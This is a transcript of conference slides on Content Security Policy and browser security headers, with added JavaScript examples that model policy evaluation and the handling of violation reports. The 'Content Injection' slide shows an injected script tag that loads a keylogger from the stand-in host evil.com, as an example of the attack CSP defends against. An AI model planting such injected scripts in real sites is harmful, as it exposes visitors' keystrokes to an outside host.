d3ldn17 - recruiting the browser
TRANSCRIPT
![Page 1: D3LDN17 - Recruiting the Browser](https://reader031.vdocuments.net/reader031/viewer/2022022415/5a6492627f8b9a27568b6adf/html5/thumbnails/1.jpg)
Recruiting The Browser
Scott Helme
@Scott_Helme | scotthelme.co.uk
How security has evolved
Browser support
Content Security Policy
Content Injection
```html
<html>
<body>
<comment>
<!-- attacker-controlled content (for example a user comment) rendered without encoding -->
<script src="evil.com/keylogger.js"></script>
</comment>
…
```
What is CSP?
The policy is delivered as an HTTP response header alongside the others:
```http
cache-control: max-age=0, no-cache
content-encoding: gzip
content-security-policy: [policy goes here]
date: Tue, 17 Oct 2017 11:30:00
server: Incapsula
status: 200
```
CSP Directives
child-src
connect-src
default-src
font-src
frame-src
img-src
media-src
object-src
script-src
style-src
A basic policy
```http
Content-Security-Policy: default-src 'self' example.com
```
Fine tuning
```http
Content-Security-Policy: default-src 'self'; script-src 'self' cdnjs.cloudflare.com ajax.googleapis.com
```
```html
<script src="https://ajax.googleapis.com/.../jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js"></script>
```
Fine tuning
```http
Content-Security-Policy: default-src 'self';
  script-src [source list];
  style-src [source list];
  img-src [source list];
  frame-src [source list];
```
Mixed-Content
block-all-mixed-content
```html
<img src="http://imgur.com/Incapsula-D3.png">
```
upgrade-insecure-requests
```html
<img src="http://imgur.com/Incapsula-D3.png">
```
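To make the source-list matching, the default-src fallback and the two mixed-content directives concrete, here is an added example in JavaScript that is not from the slides and is not any browser's real implementation: a small model of how a policy is evaluated against a single resource load. It implements 'self', scheme sources, host sources with wildcards and ports, the fall-through from a fetch directive to default-src, block-all-mixed-content and upgrade-insecure-requests; path matching, nonces and hashes are deliberately left out. The policies and URLs it is exercised with are constructed for this example.

```javascript
// Added example (not from the slides): a minimal model of how a browser
// applies a Content-Security-Policy header to one resource load.
// Policies and URLs used with it below are constructed for the example.

// Parse "default-src 'self'; script-src 'self' cdnjs.cloudflare.com" into
// { "default-src": ["'self'"], "script-src": ["'self'", "cdnjs.cloudflare.com"] }.
function parsePolicy(header) {
  const policy = Object.create(null); // no prototype, so "in" checks are safe
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // Browsers honour the first occurrence of a directive and ignore repeats.
    if (!(name in policy)) policy[name] = tokens.slice(1);
  }
  return policy;
}

const DEFAULT_PORT = { "http:": "80", "https:": "443", "ws:": "80", "wss:": "443" };

// Does one source expression (e.g. 'self', https:, *.example.com:8443) match the URL?
function sourceMatches(source, url, doc) {
  const src = source.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return url.origin === doc.origin;
  if (src === "*") return url.protocol in DEFAULT_PORT;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return url.protocol === src; // scheme-source such as https:
  if (src.startsWith("'")) return false; // 'unsafe-inline', nonces and hashes govern inline code, not URLs

  // host-source: [scheme://]host[:port][/path]; the path part is ignored here.
  let scheme = null;
  let rest = src;
  const sep = src.indexOf("://");
  if (sep !== -1) {
    scheme = src.slice(0, sep + 1);
    rest = src.slice(sep + 3);
  }
  if (scheme) {
    if (url.protocol !== scheme) return false;
  } else if (url.protocol !== doc.protocol && !(doc.protocol === "http:" && url.protocol === "https:")) {
    return false; // no scheme given: inherit the document's scheme (http pages may still load https)
  }
  const [host, port] = rest.split("/")[0].split(":");
  const hostOk = host.startsWith("*.") ? url.hostname.endsWith(host.slice(1)) : url.hostname === host;
  if (!hostOk) return false;
  if (port !== undefined && port !== "*" && (url.port || DEFAULT_PORT[url.protocol]) !== port) return false;
  return true;
}

// Decide whether a load is allowed. `directive` is the fetch directive that
// governs the resource type (script-src for <script>, img-src for <img>, ...).
function evaluateLoad(header, directive, resourceUrl, documentUrl) {
  const policy = parsePolicy(header);
  const doc = new URL(documentUrl);
  let url = new URL(resourceUrl);

  // upgrade-insecure-requests: http:// subresources are rewritten to https://
  // before the source lists are consulted, so the load is never mixed content.
  if ("upgrade-insecure-requests" in policy && url.protocol === "http:") {
    url = new URL(url.href.replace(/^http:/, "https:"));
  }
  // block-all-mixed-content: an https document refuses plaintext subresources outright.
  if ("block-all-mixed-content" in policy && doc.protocol === "https:" && url.protocol === "http:") {
    return { allowed: false, effectiveDirective: directive, violatedDirective: "block-all-mixed-content", url: url.href };
  }
  // A fetch directive that is not set falls back to default-src. With neither
  // present the load is unrestricted; a directive with an empty list means 'none'.
  const governing = directive in policy ? directive : "default-src";
  const sources = policy[governing];
  if (sources === undefined) {
    return { allowed: true, effectiveDirective: directive, violatedDirective: null, url: url.href };
  }
  const allowed = sources.some((s) => sourceMatches(s, url, doc));
  return { allowed, effectiveDirective: directive, violatedDirective: allowed ? null : governing, url: url.href };
}
```

Running evaluateLoad with the fine-tuning policy from the slides shows the point of the fallback: a script from cdnjs.cloudflare.com loads, but an image from the same host is refused, because img-src was never set and falls through to default-src 'self'. With default-src https: on an https page the http:// imgur image is refused; adding upgrade-insecure-requests rewrites it to https:// first and it loads, while block-all-mixed-content refuses it before any source list is consulted.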
Testing CSP
```http
Content-Security-Policy-Report-Only: [policy]
```
In report-only mode the browser logs and reports each violation but still loads the resource, so a policy can be tested against real traffic before it is enforced.
Console:
```
Refused to load the script 'https://code.jquery.com/jquery.1.11.3min.js' because it violates the following Content Security Policy directive: script-src
```
Testing CSP
```http
Content-Security-Policy-Report-Only: [policy]; report-uri https://report-uri.io
```
The browser POSTs each violation to the report-uri endpoint as JSON:
```json
{
  "csp-report": {
    "document-uri": "http://scotthelme.co.uk/blah/",
    "violated-directive": "default-src https:",
    "effective-directive": "img-src",
    "blocked-uri": "http://imgur.com" ...
```
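What a reporting endpoint has to do with these documents, as an added example in JavaScript that is neither the slides' code nor report-uri.io's: validate each report, drop the noise that a Report-Only policy collects from browser extensions, and tally the rest by effective directive and blocked origin, which is the shape you need when turning violations into source-list entries. The sample reports are constructed for this example (the first mirrors the JSON above); the extension URL and other values in them are made up.

```javascript
// Added example (not from the slides): a receiver for CSP violation reports.
// The reports at the bottom are constructed for this example.

const REQUIRED_FIELDS = ["document-uri", "violated-directive", "blocked-uri"];

// Schemes that only show up because something was injected into the browser
// itself, not because of the page's own markup; they are not actionable.
const EXTENSION_SCHEMES = ["chrome-extension:", "moz-extension:", "safari-extension:", "ms-browser-extension:"];

// Parse one POST body into a normalised report, or null if it is unusable.
function parseCspReport(body) {
  let parsed;
  try {
    parsed = JSON.parse(body);
  } catch {
    return null; // not JSON
  }
  const r = parsed && parsed["csp-report"];
  if (!r || typeof r !== "object") return null;
  if (REQUIRED_FIELDS.some((k) => typeof r[k] !== "string")) return null;
  return {
    documentUri: r["document-uri"],
    violatedDirective: r["violated-directive"],
    // Older browsers omit effective-directive; in that case the first token of
    // violated-directive is the directive name.
    effectiveDirective: r["effective-directive"] || r["violated-directive"].split(/\s+/)[0],
    blockedUri: r["blocked-uri"],
    sourceFile: typeof r["source-file"] === "string" ? r["source-file"] : null,
  };
}

function isExtensionNoise(report) {
  const fromExtension = (v) => v !== null && EXTENSION_SCHEMES.some((s) => v.startsWith(s));
  return fromExtension(report.blockedUri) || fromExtension(report.sourceFile);
}

// Browsers already strip cross-origin blocked URIs down to an origin; same-origin
// ones keep their path. Normalise both to an origin so the tally lines up with
// what you would add to a source list. Keywords such as "inline", "eval" and
// "data" are not URLs and pass through unchanged.
function blockedOrigin(blockedUri) {
  try {
    return new URL(blockedUri).origin;
  } catch {
    return blockedUri;
  }
}

// Tally usable reports as "<effective-directive> <blocked origin>" -> count.
function summariseReports(bodies) {
  const counts = Object.create(null);
  let dropped = 0;
  for (const body of bodies) {
    const report = parseCspReport(body);
    if (report === null || isExtensionNoise(report)) {
      dropped += 1;
      continue;
    }
    const key = `${report.effectiveDirective} ${blockedOrigin(report.blockedUri)}`;
    counts[key] = (counts[key] || 0) + 1;
  }
  return { counts, dropped };
}

// Constructed sample: the imgur report from the slide (twice), an old-style
// report without effective-directive, an inline script, extension noise,
// a non-JSON body and a report missing required fields.
const SAMPLE_REPORTS = [
  JSON.stringify({ "csp-report": { "document-uri": "http://scotthelme.co.uk/blah/", "violated-directive": "default-src https:", "effective-directive": "img-src", "blocked-uri": "http://imgur.com" } }),
  JSON.stringify({ "csp-report": { "document-uri": "http://scotthelme.co.uk/blah/", "violated-directive": "default-src https:", "effective-directive": "img-src", "blocked-uri": "http://imgur.com" } }),
  JSON.stringify({ "csp-report": { "document-uri": "https://scotthelme.co.uk/", "violated-directive": "script-src 'self'", "blocked-uri": "https://code.jquery.com/jquery.min.js" } }),
  JSON.stringify({ "csp-report": { "document-uri": "https://scotthelme.co.uk/", "violated-directive": "script-src 'self'", "effective-directive": "script-src", "blocked-uri": "inline" } }),
  JSON.stringify({ "csp-report": { "document-uri": "https://scotthelme.co.uk/", "violated-directive": "script-src 'self'", "effective-directive": "script-src", "blocked-uri": "chrome-extension://example/inject.js" } }),
  "not json",
  JSON.stringify({ "csp-report": { "document-uri": "https://scotthelme.co.uk/" } }),
];
```

summariseReports(SAMPLE_REPORTS) yields two img-src violations for http://imgur.com, one script-src violation each for https://code.jquery.com and inline, and three dropped bodies; the imgur entries are what upgrade-insecure-requests or an https-only image host would fix, while the inline entry is the one that needs a nonce, hash or a move of the script into a file.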
Other Security Headers
Content-Security-Policy
Content-Security-Policy-Report-Only
X-WebKit-CSP (legacy prefixed header)
X-Content-Security-Policy (legacy prefixed header)
Public-Key-Pins
Public-Key-Pins-Report-Only
Expect-Staple
Expect-CT
X-XSS-Protection
Secure all the things!
@Scott_Helme | scotthelme.co.uk
Scott Helme